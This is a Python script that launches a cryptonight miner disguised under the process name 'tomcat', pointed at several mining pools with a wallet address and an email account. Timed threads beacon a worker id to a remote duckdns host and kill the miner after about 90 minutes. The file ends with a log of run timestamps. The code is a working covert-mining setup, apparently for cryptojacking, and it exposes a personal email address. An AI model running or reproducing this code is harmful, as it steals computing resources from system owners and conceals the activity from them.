import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:57:06.019600
#2018-02-17 16:44:05.273177
#2018-02-17 18:33:07.633713
#2018-02-17 20:21:03.633816
#2018-02-17 22:08:04.322118
#2018-02-17 23:52:04.921667
#2018-02-18 01:41:04.103633
#2018-02-18 03:28:04.740559
#2018-02-18 05:16:07.227527
#2018-02-18 07:10:06.497386
#2018-02-18 08:58:07.544319
#2018-02-18 10:45:01.716004
#2018-02-18 12:28:01.798275
#2018-02-18 14:16:07.730976
#2018-02-18 16:07:05.221915
#2018-02-18 17:55:07.615405
#2018-02-18 19:41:06.790228
#2018-02-18 21:26:06.803676
#2018-02-18 23:15:04.530362
#2018-02-19 01:03:05.187430
#2018-02-19 02:50:07.096991
#2018-02-19 04:36:07.667214
#2018-02-19 06:21:03.623880
#2018-02-19 08:09:05.467596
#2018-02-19 09:59:06.288799
#2018-02-19 11:48:04.423146
#2018-02-19 13:33:05.451282
#2018-02-19 15:21:08.289574
#2018-02-19 17:09:05.601800
#2018-02-19 18:54:07.564119
#2018-02-19 20:42:05.934730
#2018-02-19 22:29:04.515353
#2018-02-20 00:15:08.760295
#2018-02-20 02:04:07.043739
#2018-02-20 03:54:05.015041
#2018-02-20 05:38:04.299007
#2018-02-20 07:23:06.386233
#2018-02-20 09:08:01.465749
#2018-02-20 10:51:03.907220
#2018-02-20 12:38:02.182849
#2018-02-20 14:23:06.918272
#2018-02-20 16:09:04.619679
#2018-02-20 17:53:09.292662
#2018-02-20 19:44:02.099477
#2018-02-20 21:33:01.483939
#2018-02-20 23:15:01.720827
#2018-02-21 00:58:06.559313
#2018-02-21 02:44:05.934217
#2018-02-21 04:35:01.280139
#2018-02-21 06:23:07.614915
#2018-02-21 08:10:08.713128
#2018-02-21 09:56:07.823510
#2018-02-21 11:44:02.066073
#2018-02-21 13:36:05.839889
#2018-02-21 15:20:03.806592
#2018-02-21 17:10:07.045460
#2018-02-21 18:58:06.121240
#2018-02-21 20:38:07.087040
#2018-02-21 22:23:02.193108
#2018-02-22 00:12:08.379400
#2018-02-22 03:01:05.701866
#2018-02-22 04:48:04.002496
#2018-02-22 06:33:05.097586
#2018-02-22 08:21:03.928330
#2018-02-22 10:08:04.752146
#2018-02-22 11:53:05.222100
#2018-02-22 13:37:08.804922
#2018-02-22 15:25:10.705054
#2018-02-22 17:12:01.647178
#2018-02-22 18:57:08.625245
#2018-02-22 20:49:07.733608
#2018-02-22 22:36:07.908420
#2018-02-23 00:22:04.876689
#2018-02-23 02:11:01.794624
#2018-02-23 03:59:04.755277
#2018-02-23 05:46:04.764658
#2018-02-23 07:41:01.392032
#2018-02-23 09:43:08.391912
#2018-02-23 11:48:12.988952
#2018-02-23 13:39:08.330063
#2018-02-23 15:26:08.585618
#2018-02-23 17:17:05.099103
#2018-02-23 18:59:08.770292
#2018-02-23 20:45:09.019253
#2018-02-23 22:32:07.935983
#2018-02-24 00:19:05.487825
#2018-02-24 02:09:04.312532
#2018-02-24 03:59:01.960373
#2018-02-24 06:42:03.988599
#2018-02-24 08:31:07.113450
#2018-02-24 10:18:05.006077
#2018-02-24 12:13:06.342161
#2018-02-24 13:59:05.294810
#2018-02-24 15:50:04.437797
#2018-02-24 17:38:07.372015
#2018-02-24 19:24:06.316567
#2018-02-24 21:15:07.638658
#2018-02-25 01:15:06.844834
#2018-02-25 05:10:06.766972
#2018-02-25 10:44:01.660690